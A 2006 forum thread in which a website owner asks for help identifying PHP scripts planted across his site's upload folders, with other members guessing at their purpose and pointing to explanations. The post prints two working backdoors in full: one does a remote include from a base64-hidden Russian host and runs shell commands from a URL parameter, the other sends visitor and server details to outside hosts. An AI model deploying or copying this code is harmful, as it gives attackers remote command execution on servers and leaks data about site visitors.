| Author |
Message |
Alex
ZEQ2 Effects Programmer
|
 Thursday, May 04, 2006
I just found a dozen or two of these scripts on my website in loads of folders, they seem to be including something off a remote russian site and runnign a system command, but I have no idea where they came from or how they arrived on my site. Any ideas? They seem to be in practically every folder which a php script can upload to (be it invision's uploads or archive folders, my scripts' upload folders, any which has write access) and they come in pairs. Not to mention I also found a file manage script and a system command executor script sitting unprotected in the root of public_html. I've cleared out all the ones I can find and removed write permissions from everything, though any suggestions as to what it's all about, how it was done, or anything? Cheers.
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @ include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%you", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){ system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".". base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
|
|
RiO
|
Friday, May 05, 2006
Looks like your typical webserver being hacked by a bunch of Russians. Probably used some kind of exploit to upload a file through which to get further control and upload the rest of the gunk. This stuff just happens to some people sometimes.
If I'd wager a guess I'd say it is designed to remotely link to, or redirect to, another hacked site from which an exploit is ran.
|
Ussj_gohan
|
Saturday, May 06, 2006
RiO wrote : Looks like your typical webserver being hacked by a bunch of Russians.
How do you know that they where russians??  
|
zane
|
Saturday, May 06, 2006
gohan..
they seem to be including something off a remote russian site and runnign a system command
|
Morpherex
|
Monday, May 08, 2006
Google Entry
Moderator : Fixed URL Wrapping
|
|
Alex
ZEQ2 Effects Programmer
|
Monday, May 08, 2006
Now why didn't I think of googling the base64 string? 
Morph, you rock, third result was a blog post describing it exactly. Apparently there's also .htaccess files which forward 404 errors to those scripts, so I'm going to go clean them up now. Thanks again, guys.
Edit: If anyone's interested, here's a couple of articles on the exploit:
Article 1
Article 2
Edit2: And more info
|
